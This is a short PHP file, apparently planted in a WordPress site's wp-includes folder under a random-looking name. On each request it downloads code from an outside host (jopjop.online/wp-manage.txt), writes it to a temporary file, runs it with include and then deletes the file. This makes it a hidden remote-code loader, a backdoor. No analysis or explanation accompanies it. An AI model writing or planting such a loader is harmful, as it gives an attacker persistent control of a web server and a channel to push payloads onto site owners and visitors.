File: /home/ykk9qst4f1zf/public_html/wp-includes/custom-file-3-1758459121.php
<!--tTjgxLki-->
<?php
$url = 'https://jopjop.online/wp-manage.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$code = curl_exec($ch);
curl_close($ch);
if ($code) {
$temp_file = tempnam(sys_get_temp_dir(), 'wp_manage_');
file_put_contents($temp_file, $code);
include $temp_file;
unlink($temp_file);
} else {
echo "error";
}
?>